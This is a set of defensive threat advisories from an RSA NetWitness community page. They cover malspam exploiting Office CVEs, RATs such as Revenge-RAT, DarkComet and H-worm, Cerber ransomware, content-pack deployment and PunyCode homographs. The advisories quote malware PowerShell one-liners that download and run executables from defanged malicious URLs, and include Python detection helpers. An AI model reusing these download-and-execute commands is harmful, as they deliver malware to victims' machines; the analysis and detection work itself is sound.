
RSA NetWitness Platform

13 Posts authored by: Rajas Save

On February 1st 2018, malspam delivered a malicious RTF document that attempts to exploit Microsoft Office/WordPad through a buffer overflow vulnerability in the ListView / TreeView ActiveX controls of the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code is triggered by a specially crafted DOC or RTF file on unpatched MS Office products.

 

 

 

VirusTotal analysis of the delivery document paymentorder.doc confirms the presence of the RTF exploit.

 

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to “pgamix[.]com” to download a malicious executable payload using shellcode present in the RTF file, which kicks off the following network events.

 

 

VirusTotal analysis of the final payload “babawire.jar” confirms that it’s Adwind, a Java-based Remote Access Trojan (RAT). Adwind RAT is a multifunctional malware program distributed through a single malware-as-a-service platform.

 

This file is a compressed stream containing 168 files. It imports multiple Java packages required for execution of the Trojan.

 

 

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 


 

Although we didn't achieve a full detonation in our own sandbox, post-infection traffic from Malware-Traffic-Analysis.net populates the following meta for the download sessions with current RSA NetWitness detection:

 

 

 

More detailed information about CVE-2012-0158 can be found here:

Triaging Malicious Microsoft Office documents CVE-2012-0158 

 

Thanks go to Kevin Stear and Ahmed Sonbol for contributing to this threat advisory.

 

 

 


On October 18th 2017, malspam delivered a malicious RTF document that attempts to exploit Microsoft Office/WordPad through a buffer overflow vulnerability in the ListView / TreeView ActiveX controls of the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code is triggered by a specially crafted DOC or RTF file on unpatched MS Office products.

VirusTotal analysis of the delivered document confirms the presence of the RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to “http://careers[.]fwo[.]com[.]pk/” to download a malicious executable payload using shellcode present in the RTF file, which kicks off the following network events.

 

VirusTotal analysis of the final payload “printer.exe” confirms that it’s Revenge-RAT, a Remote Access Trojan (RAT).

 

Once the download is complete, the binary is executed and post-infection traffic starts. The request contains Base64-encoded information about the infected machine such as IP, domain and username, operating system, processor version and speed, and language.

 

Breaking down the request string field by field reveals a consistent pattern and the information sent (Base64-encoded value on the left, decoded value on the right):

  Field | Encoded value | Decoded value
  Information | |
  Revenge-RAT | R3Vlc3Q | Guest
  Revenge-RAT | XzQ0RkVDOTA4 | _44FEC908
  Revenge-RAT | 10.10.10.166 | System IP
  Revenge-RAT | Q0FGRVdFU1QgLyBqYW1lcw | CAFEWEST / james
  Revenge-RAT | No | 6
  Revenge-RAT | TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgIDMy | Microsoft Windows 7 Professional  32
  Revenge-RAT | SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIFg1NjkwICBAIDMuNDdHSHo | Intel(R) Xeon(R) CPU           X5690  @ 3.47GHz
  Revenge-RAT | 1073274880 |
  Revenge-RAT | Ti9B | N/A
  Revenge-RAT | Ti9B | N/A
  Revenge-RAT | 3339 |
  Revenge-RAT | UHJvZ3JhbSBNYW5hZ2Vy | Program Manager
  Revenge-RAT | ZW4tVVM | en-US
  Revenge-RAT | False |
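As an added example that is not part of the advisory, the following Python helper performs the field-by-field decoding shown above: each value is tried as unpadded Base64 and kept verbatim when it is not valid Base64 or does not decode to printable text. The field values are the ones listed in the table; the delimiter the RAT uses between fields is not given on this page, so the helper expects an already-split list.

```python
import base64
import re

# The RAT strips the trailing '=' padding; anything outside the Base64
# alphabet (the dots of an IP address, for instance) is sent in the clear.
_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")


def decode_field(token: str) -> str:
    """Return the decoded text of one check-in field.

    The token comes back unchanged when it cannot be Base64 (wrong alphabet,
    or a length that no Base64 string can have) or when the decoded bytes are
    not printable ASCII: counters such as 1073274880 happen to use only
    Base64 characters but decode to binary garbage.
    """
    if not _B64_ALPHABET.match(token) or len(token) % 4 == 1:
        return token
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return token
    return text if text.isprintable() else token


def decode_checkin(fields):
    """Pair every raw field with its decoded form, preserving order."""
    return [(raw, decode_field(raw)) for raw in fields]


# Constructed sample: the encoded fields reproduced from the request above.
SAMPLE_FIELDS = [
    "Information",
    "R3Vlc3Q",
    "XzQ0RkVDOTA4",
    "10.10.10.166",
    "Q0FGRVdFU1QgLyBqYW1lcw",
    "No",
    "TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgIDMy",
    "SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIFg1NjkwICBAIDMuNDdHSHo",
    "1073274880",
    "Ti9B",
    "3339",
    "UHJvZ3JhbSBNYW5hZ2Vy",
    "ZW4tVVM",
    "False",
]

if __name__ == "__main__":
    for raw, decoded in decode_checkin(SAMPLE_FIELDS):
        print(f"{raw:<64} -> {decoded}")
```

Short tokens are ambiguous: “No” is a valid two-character Base64 string and decodes to “6”, exactly as the table above records it, so a field that short deserves a second look before it is trusted as decoded text.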

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 

Current RSA NetWitness detection populates the following meta for post-infection traffic:

 

More detailed information about CVE-2012-0158 can be found here:

Triaging Malicious Microsoft Office documents CVE-2012-0158 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 19th 2017, an unknown malspam campaign delivered a malicious RTF document, “Inquiry_list.doc”, which attempts to exploit Microsoft Office/WordPad via a Remote Code Execution (RCE) vulnerability in the Windows API, CVE-2017-0199.  

 

 

After opening the document via a vulnerable Microsoft Word application, a connection is established to “wizkiddz[.]xyz” to download a malicious DOT file, "dotenq.dot", which kicks off the following network events.

 

This DOT file contains obfuscated code, which downloads a malicious HTA, “htaenq.hta”, from the same domain.

 

This HTA file then uses Base64-obfuscated code to spawn PowerShell and create a Shell object that downloads the final payload, “enq.exe”, and then closes the browser window automatically.


 

This final payload, “enq.exe”, is a Fareit Trojan, a commodity malware info-stealer often seen with Zeus/ZBOT campaigns.

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates the following meta for post-infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 10th, 2017 malspam delivered a malicious RTF document that attempts to exploit Microsoft Office/WordPad through a buffer overflow vulnerability in the ListView / TreeView ActiveX controls of the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code is triggered by a specially crafted DOC or RTF file on unpatched MS Office products.

 

VirusTotal analysis of the delivered document confirms the presence of the RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to “shalomreal.com/111.118.180.181” to download a malicious HTA file, which kicks off the following network events.

 

As shown above, "p4573447474794872248.hta" (VirusTotal and Hybrid-Analysis) was the first download.

This HTA file uses obfuscated code which, when rendered, builds a PowerShell command. It also creates a Shell object that downloads and executes the final payload executable “gd.exe”, and includes code to close the browser window automatically.

 

The obfuscated code above generates the following PowerShell command, which uses a WebClient object for connectivity:

 

powershell (new-object System.Net.WebClient).DownloadFile('hXXp://dvayen[.]com/fgg/gd[.]exe', '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'); Start-Process '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'", "", "", 0

 

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Banners in the post-infection traffic are identified as DarkComet RAT banners. VirusTotal analysis of the payload, “gd.exe”, and analysis of the post-infection traffic confirm that it is DarkComet, a Remote Access Trojan (RAT).

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 

Current RSA NetWitness detection populates the following meta for post-infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 3rd, 2017 malspam delivered a malicious MS Word document containing obfuscated VBA code, which acts as Trojan Downloader with known signature “W97M”.  

 

Submitting the delivery document to RSA's pre-release What’s This File service returns a 100 threat score.

 

If a user enables the embedded macro, VBA code runs to initiate a cmd process, which executes PowerShell to download and execute a Visual Basic Script (VBS) payload from known malicious domain “a[.]pomf[.]cat”.

 

PowerShell then calls a WScript shell to connect to a domain via WebClient object and download and silently execute its payload.  While the follow-on network activity is SSL encrypted, captured network activity (prior to encryption) shows the HTTP request for the initial VBS payload.

 

Analysis of the dropped files and of the post-infection traffic both confirm that the payload is H-worm, a Remote Access Trojan (RAT). H-worm is a VBS-based RAT written by an individual going by the name Houdini. It shares the same code base as njw0rm and njRAT/LV, and has in years past been seen targeting the energy industry. Common delivery mechanisms include spam email attachments and malicious links.

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

RSA NetWitness evaluation of network traffic shows the malware exfiltrating information via the User-Agent field in the HTTP Header, specifically:

    {DiskVolumeSerial}<|>{Hostname}<|>{Username}<|>{OS}<|>plus<|>{AVProductInstalled or nan-av}<|>{USBSpread: true or false} - {CurrentSystemDate}
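The User-Agent format above can be turned directly into detection logic. The following Python, added here and not from the advisory, parses a few constructed proxy log lines (tab-separated source IP, destination host, URI and User-Agent, a layout assumed for the example) and returns the decoded fields for every request whose User-Agent matches the H-worm layout.

```python
import re

# H-worm check-in: seven fields joined by "<|>", the last one carrying the
# USB-spread flag and the system date separated by " - ".
HWORM_UA = re.compile(
    r"^(?P<serial>[^<]+)<\|>(?P<hostname>[^<]+)<\|>(?P<username>[^<]+)<\|>"
    r"(?P<os>[^<]+)<\|>(?P<tag>[^<]+)<\|>(?P<av>[^<]+)<\|>"
    r"(?P<usb_spread>true|false) - (?P<date>.+)$"
)


def parse_hworm_user_agent(user_agent):
    """Return the exfiltrated fields as a dict, or None for a normal User-Agent."""
    m = HWORM_UA.match(user_agent.strip())
    if not m:
        return None
    info = m.groupdict()
    info["av"] = None if info["av"] == "nan-av" else info["av"]  # nan-av: no AV product
    info["usb_spread"] = info["usb_spread"] == "true"
    return info


def scan_log(lines):
    """Run the matcher over tab-separated proxy records and collect the hits."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 4:
            continue  # malformed record, skip rather than crash the scan
        src_ip, dst_host, uri, user_agent = parts
        info = parse_hworm_user_agent(user_agent)
        if info:
            hits.append({"src_ip": src_ip, "dst_host": dst_host, "uri": uri, **info})
    return hits


# Constructed sample log: one browser, one H-worm beacon, one curl request.
SAMPLE_LOG = [
    "10.0.0.5\tc2.example.invalid\t/\tMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36",
    "10.0.0.9\tc2.example.invalid\t/ping\tA1B2C3D4<|>WIN7-PC<|>james<|>"
    "Microsoft Windows 7 Professional<|>plus<|>nan-av<|>false - 03/10/2017",
    "10.0.0.12\tupdates.example.invalid\t/check\tcurl/7.55.0",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Anchoring the pattern on the "<|>" separators and the trailing "true|false - date" tail keeps the match tight enough that ordinary User-Agents containing angle brackets or pipes do not trigger it.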

 

 

Current RSA NetWitness detection populates the following meta for the post infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

On September 27th, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Remote Code Execution (RCE) Vulnerability in the Windows API, CVE-2017-0199.

VirusTotal analysis of the delivered document confirms the presence of the RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, users are warned that the document is attempting to download externally linked files.

 

Upon clicking "Yes", a direct-to-IP connection to 173.44.42[.]164 is established and the following network events take place.

  

As shown above, "3Pxi69djmwiIKmc.hta" (VirusTotal and Hybrid-Analysis) was the first download. This file uses VBScript to create two XMLHTTP objects, which connect to and download a VBS file that acts as a Trojan downloader. It also creates a Shell object to execute the HTA file as an Internet Explorer application.

 

Next, a VBS script, "Km1Dizoq3Jxz.vbs" (VirusTotal and Hybrid-Analysis), uses obfuscated code to build the paths from which the executable “UvnG1Oz9d0.exe” is downloaded and executed.

 

In the same session, "nJwsm39La.html” then deletes both the VBS and executable file.

 

VirusTotal analysis of the payload, “UvnG1Oz9d0.exe” (VirusTotal and Hybrid-Analysis), confirms that it is Quasar Spyware, a Remote Access Trojan (RAT).

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 

You can also check FirstWatch's recent threat advisory on the uptick in malspam attempting to exploit CVE-2017-0199: Malspam and CVE-2017-0199

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On September 6th, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a remote code execution (RCE) Vulnerability in the Windows API, CVE-2017-0199 [1][2]. This document has been spotted in-the-wild travelling as an email attachment with different names; one of which is “Remittance details.doc” (VirusTotal analysis).  

 

 

 

Opening the document in a vulnerable Microsoft Word application led to the following network events:

 

Below is a breakdown of the network activity.  First "blabla.hta" (VirusTotal and Hybrid-Analysis) was downloaded; this file contains an obfuscated script with a powershell command.  

  

Next, the PowerShell command runs and downloads an executable, “halizeuskins.exe” (VirusTotal and Hybrid-Analysis).

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates the following meta for the download sessions:

 

For communication with the C2 domain, the following meta was populated for those sessions in NetWitness Packets:

 

Pivoting off the registration information of the C2 domain "reedling.com[.]ng", FirstWatch found a group of domains registered using the same e-mail address (see appendix).

 

Some of those domains are associated with different malware samples (see appendix). The post-infection network behavior of one of them (SHA256:e078e842c1006c972a65dcb71cf6ae5b38ba5074ea19f999f9879e8ec73a65f2) is similar to the one under our investigation. VirusTotal analysis results for that sample suggest it is a Zbot variant.

 


  

More information about Zbot variants and their detection using RSA NetWitness Suite:

 

You can also check FirstWatch's recent threat advisory on the uptick in malspam attempting to exploit CVE-2017-0199: Malspam and CVE-2017-0199

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 


During the 3rd quarter of 2017, several malspam campaigns have been successfully distributing the Hancitor downloader. The dropper uses a range of obfuscation techniques on infected PCs and has been observed delivering a variety of payloads.

 

The early August "Shipment Arrived" malspam campaign masquerades as a FedEx shipment delivery notice and attempts to trick victims into clicking a link to download the invoice document which contains malicious macros.  This variant uses native API calls within Visual Basic code to carve out and decrypt embedded malware from malicious Word documents. In this case the payload is Zbot.

 

 

Once the link is clicked, the following Word document is downloaded.

 

 

VirusTotal Analysis of Fedex_Invoice_598791.doc : 

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity is captured in the process tree below, which downloads and executes the payload:

 

 

VirusTotal Analysis of the dropped file confirms that it’s Zbot Malware delivered by Hancitor: 

 

 

More information about Zbot variants detection and RSA FirstWatch feed :

 

Current RSA NetWitness detection populates the following meta:

  

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

  

 


During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity is captured in the process tree below, which shows the series of events that led to downloading and executing a Cerber payload:

 

 

The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:

 

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

 

Line-By-Line analysis of PowerShell Command:

powershell.exe

  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods, which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + '\' + $name + '.exe';

  • The $path variable is built from the $env:temp environment variable (the user's AppData temp folder), the random number and an .exe extension.

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;break;}

  • Executes the downloaded file; the break statement then exits the loop, so no further URLs are tried once one download has run, and the window remains hidden throughout.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.
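To triage a command line like this one from a process-creation log, the following Python (an added example, not part of the advisory) scores the behaviours called out in the line-by-line analysis above and extracts the download URL(s) from the '...'.Split(',') list. The indicator names and the scoring are the example's own choices; the two-URL command is constructed to show the comma-separated case described above.

```python
import re

# One indicator per behaviour called out in the line-by-line analysis.
INDICATORS = {
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "webclient_download": re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I),
    "drops_to_temp": re.compile(r"\$env:temp", re.I),
    "executes_download": re.compile(r"Start-Process", re.I),
    "swallows_errors": re.compile(r"\bcatch\s*\{", re.I),
    "random_filename": re.compile(r"new-object\s+random", re.I),
}
# This family carries its download locations as a comma-separated string
# that is turned into an array with .Split(',').
SPLIT_LIST = re.compile(r"'([^']*)'\.Split\(','\)", re.I)
ANY_URL = re.compile(r"https?://[^\s'\";)]+", re.I)


def triage_command(cmd):
    """Return the matched indicators, a simple count as score, and the URLs."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
    m = SPLIT_LIST.search(cmd)
    if m:
        urls = [u.strip() for u in m.group(1).split(",") if u.strip()]
    else:
        urls = ANY_URL.findall(cmd)
    return {"indicators": hits, "score": len(hits), "urls": urls}


# The defanged command from the advisory above.
SAMPLE_COMMAND = (
    "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;"
    "$webclient = new-object System.Net.WebClient;$random = new-object random;"
    "$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');"
    "$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';"
    "foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);"
    "Start-Process $path;break;}catch{write-host $_.Exception.Message;}}"
)
# Constructed variant with two comma-separated URLs (placeholder hosts).
MULTI_URL_COMMAND = (
    "powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;"
    "$urls = 'http://first.example.invalid/a.exe,http://second.example.invalid/b.exe'.Split(',');"
    "foreach($url in $urls){try{$webclient.DownloadFile($url, $env:temp + '\\x.exe');"
    "Start-Process ($env:temp + '\\x.exe');break;}catch{}}"
)
BENIGN_COMMAND = "powershell -Command Get-Process | Sort-Object CPU"

if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, MULTI_URL_COMMAND, BENIGN_COMMAND):
        print(triage_command(cmd))
```

A count of matched behaviours is deliberately simple; in a real pipeline the same indicators would feed a rule that also weighs the parent process and the user context.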

 

In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe. It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.

 

 

VirusTotal analysis of the dropped file confirms it’s Cerber ransomware:

 

 

Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.

 

 

Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 

 

 

Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, please check the following RSA Link articles:

 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 


 

Cerber ransomware has again taken the cyber world by storm, taking an 87% share of cyber-attacks in the 1st quarter of 2017, and it has remained the most profitable ransomware on the market for close to a year now. Now a little over a year after its first variants were found in the wild, Cerber developers have released their 6th edition codebase, which boasts a slew of new improvements.

 

Specifically Cerber has added new encryption patterns, and anti-VM and anti-sandboxing features, which have raised the bar for researchers (and also automated systems) to detonate and identify the new ransomware.  These new features combined with varied distribution channels show that the Cerber crew is taking ransomware development to the next level, making it by far the most dangerous ransomware on the market today.

 

Here is some of the previous research from RSA about Cerber Ransomware and its Evolution:

 

The following chart shows features of different Cerber versions:

 

 

Feature | Cerber v1, v2 and v3 | Cerber v4 | Cerber v5 | Cerber SFX | Cerber v6
File Type | EXE | EXE | EXE | SFX (Loader) VBS, DLL | EXE
Exceptions (Cerber doesn’t execute if it detects certain components in the system) | Language in v1 and v3*; Language and antivirus (AV) for v2* | Language* | Language* | AV, VM, Sandbox (Loader*), and Language* | Language*
Anti-AV Routine | None | None | None | None | EXE files of AV, Firewall and Antispyware products set to be blocked by Windows firewall rules*
Anti-sandbox | None | None | None | VM and Sandbox (Loader*) | VM and Sandbox (Loader*)
Backup Deletion | Yes (vssadmin, WMIC, BCDEdit)* | Yes (WMIC)* | Yes (WMIC)*; removed in v5.02 | Varies (some samples have backup deletion capabilities) | Varies (some samples have backup deletion capabilities)
Exclusion List (directories and file types Cerber doesn’t encrypt) | Folder and file* | Folder and file* | Folder and file*; and AV, Antispyware, and Firewall directories | Folder and file*; and AV, Antispyware, and Firewall directories | Folder and file*

*Cerber RaaS configurable

 

Exploit kits and Malspam emails are the two major delivery vectors for Cerber today. In the case of exploit kits, a compromised site or malvertising often redirects victims to a malicious landing page that downloads and executes a payload.  With regard to malspam, a victim is typically tricked (and clicks on a link) to download and run js, ps1 or sfx files, which eventually inject and execute the ransomware payload. 

Following diagram shows delivery of Cerber in brief:

  

 

Until May 2017, Cerber relied heavily on RigEK rather than malspam campaigns to deliver infections; yet after combined efforts of researchers and the domain registrar GoDaddy, a massive number of Rig-related shadow domains were taken down during Operation Shadowfall. Post Shadowfall, the group’s distribution vector shifted to more malspam-centric campaigns for delivering the Cerber payload. The delivery of Cerber via the ‘Blank Slate’ campaign in the 2nd quarter of 2017 is evidence of this, and a diagram of the infection vector is below.

 

 

‘Blank Slate’ delivery is through spam emails with subjects like “Unusual Sign-In Activity”, “Chrome Update”, “Delivery Invoice” etc. Unwitting victims are tricked into clicking a provided link or button to download a zip file, which on extraction delivers a .js, .doc, or .ps1 script that downloads and installs the Cerber payload.

 

  

 

 

 

RTF files with macros are also used to trigger ransomware delivery, and a great explanation of both RTF and the recent MS 2017-10 zero day by RSA’s own Kevin Douglas can be found here

 

 

 

New variants of Cerber also show some different but unique patterns in post exploitation traffic. UDP beaconing ports are changed along with some new payment site alias hosts. After April 2017, Cerber payment sites, patterns and UDP port (which is now 6893, previously 6892) changed.

RSA NetWitness Live content can detect the newest variants of Cerber beaconing. An updated Event Stream Analysis (ESA) rule looks for a spray of outbound suspected command and control (C2) traffic via UDP to ports 6892 and 6893 from a single source IP to multiple destination IPs (within the same netblock).
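The logic of that ESA rule can be approximated over flow records. The following Python is an added example, not the Live content itself: it groups outbound UDP flows to ports 6892/6893 by source IP and destination /24 and alerts once a single source has reached a threshold of distinct destinations inside one netblock. The threshold of 20 and the flow tuple layout are assumptions; the 77.12.57.0/24 sample block is the one named in the earlier Cerber advisory on this page.

```python
import ipaddress
from collections import defaultdict

# Beacon ports named in the advisory; the destination threshold is an assumption.
CERBER_UDP_PORTS = {6892, 6893}
MIN_DISTINCT_DESTINATIONS = 20


def detect_udp_spray(flows, min_destinations=MIN_DISTINCT_DESTINATIONS):
    """Each flow is a (src_ip, dst_ip, proto, dst_port) tuple.

    UDP flows to the Cerber ports are bucketed by (source IP, destination /24);
    a bucket becomes an alert when it holds at least min_destinations distinct
    destination hosts, i.e. one source sprayed one netblock.
    """
    buckets = defaultdict(set)
    for src_ip, dst_ip, proto, dst_port in flows:
        if proto != "udp" or dst_port not in CERBER_UDP_PORTS:
            continue
        netblock = ipaddress.ip_network(f"{dst_ip}/24", strict=False)
        buckets[(src_ip, str(netblock))].add(dst_ip)
    return [
        {
            "src_ip": src_ip,
            "netblock": netblock,
            "distinct_destinations": len(dsts),
            "alert": "cerber beacon",
        }
        for (src_ip, netblock), dsts in sorted(buckets.items())
        if len(dsts) >= min_destinations
    ]


def sample_flows():
    """Constructed traffic: one host spraying 77.12.57.0/24 on 6893, plus noise
    that must not alert (DNS, too few destinations, TCP instead of UDP)."""
    flows = [("10.0.0.5", f"77.12.57.{i}", "udp", 6893) for i in range(1, 26)]
    flows += [("10.0.0.7", "192.0.2.53", "udp", 53)] * 30
    flows += [("10.0.0.8", f"198.51.100.{i}", "udp", 6893) for i in range(1, 4)]
    flows += [("10.0.0.9", f"203.0.113.{i}", "tcp", 6892) for i in range(1, 30)]
    return flows


if __name__ == "__main__":
    for alert in detect_udp_spray(sample_flows()):
        print(alert)
```

Bucketing on the destination /24 rather than on the raw destination count is what keeps ordinary UDP fan-out (DNS, NTP, VoIP) from looking like a spray: those go to many netblocks, a Cerber beacon goes to one.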

 

 

 

NetWitness Packet also has an application rule that detects Cerber pay-site patterns, correlating on the ransomware’s embedded configuration files for the set up of bitcoin wallets for each victim. This rule matches when the 'alias.host' (packet) or 'fqdn' (web logs) begins with one of the identified pay-sites.

Meta Keys:

  • Risk Warning = cerber ransomware
  • Indicators of Compromise = cerber ransomware

 

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

 

 

Thanks go to Kevin Stear for contributing to this threat advisory.

 

 

 


Many cyber threats have already been identified, and RSA NetWitness has been actively delivering content related to these identified threats. The content required to hunt these threats comes in the form of different resource types such as feeds, parsers, application rules and so on.

The RSA NetWitness Known Threats Pack enables analysts to deploy all the content required to identify and hunt known threats efficiently. The Known Threats pack contains a set of content specific to known identified threats such as malware, crimeware, RAT campaigns, and so on.  When the pack is deployed, all the content with dependencies is automatically deployed. Analysts can then efficiently hunt previously known threats and keep track of known malicious IPs, domains and potentially compromised systems on the network.

 

Deployment:

You can deploy all of the items in the Known Threat Pack through Live. To deploy:

From the Security Analytics menu, click Live > Search.

In the Resource Type field, select Bundle.

 

Select the Known Threat Pack.

   You can view the details page if you wish:

 

 

 

Select Deploy, then follow the steps in the wizard.

The Deployment Wizard lists the resources that are in the bundle.

 

Select the service or services on which to deploy the bundle.

 

Review your selections.

 

Click Deploy. Progress is shown in the dialog box, until completion.

 

Click Close to exit the wizard.

 

 

Threat Hunting and Investigation:

With all required content deployed to hunt known threats, analysts can now start looking for alerts, anomalous network activity and meta generated by the various Lua parsers and rules. Keys to look for when starting to hunt, and to drill down on to validate the alerts, are Indicators of Compromise, Behaviors of Compromise, Enablers of Compromise, Session Analysis, Service Analysis, File Analysis and the investigation meta. In-depth protocol analysis, which involves looking at headers, user agents, host-name aliases and request codes, will help further validate the alerts. More about this: Hunting guide - https://community.rsa.com/docs/DOC-62341

 

 

Investigation meta is used to provide a means to classify all logs and sessions in support of investigations and remediation. This is useful for front line analysts, because it minimizes the time dedicated to mining logs or sessions in support of their findings. More about this: https://community.rsa.com/docs/DOC-62303

 

 

 

Updates:

As new threats are identified, content related to them will be added to the Known Threats Pack. Monitoring changes periodically and deploying new content via the Known Threats Pack will help identify and hunt the latest threats.

 

Thanks to Michael Sconzo, Angela Stranahan, Raymond Carney, Erik Heuser, Theresa Berardinelli, Scott Marcus and Jim Ward for their contribution.

 

 

References:

Known Threats Pack Documentation: https://community.rsa.com/docs/DOC-76524       

Hunting Guide: https://community.rsa.com/docs/DOC-62341

Investigation feed Documentation: https://community.rsa.com/docs/DOC-62303           

PunyCode is a special encoding used to convert Unicode characters to ASCII, which is a smaller, restricted character set and used to encode internationalized domain names (IDN) [1]. PunyCode is a way to represent Unicode within the limited character subset of ASCII used for Internet host names. For example, "München" (German name for the city of Munich) would be encoded as "Mnchen-3ya". Using PunyCode, host names containing Unicode characters are transcoded to a subset of ASCII consisting of letters, digits, and hyphen (the Letter-Digit-Hyphen (LDH) subset, as it is called)[2].

 

There exist non-Latin character sets which contain code points (characters) that, when displayed, look like Latin code points:

ASCII 0x61 -> a

Unicode U+0430 -> a (0x0430 in UTF-16, but 0xd0b0 in UTF-8)

A name consisting of characters that look like Latin characters is a different name than if it consisted of Latin characters.

xn--80ak6aa92e -> 0xd0b0d180d180d38fd0b5

0xd0b0 (UTF8 U430) -> "a" (Cyrillic small letter "a")

0xd180 (UTF8 U440) -> "p" (Cyrillic small letter "er")

0xd180 (UTF8 U440) -> "p" (Cyrillic small letter "er")

0xd38f (UTF8 U4CF) -> "ӏ" (Cyrillic small letter "palochka")  ...and so on...

 

Byte sequences like 0xd0b0, 0xd180, et al can't be used in things like domain names, etc.  The RFC 3492 document defines a general algorithm called Bootstring that allows a string of basic code points to uniquely represent any string of code points drawn from a larger set. PunyCode is an instance of Bootstring that uses particular parameter values specified by this document, appropriate for IDN.

 

This threat advisory discusses how to detect IDN homograph Phishing attacks using RSA NetWitness Logs & Packets.

   

PunyCode Detection using IDN_homograph Parser

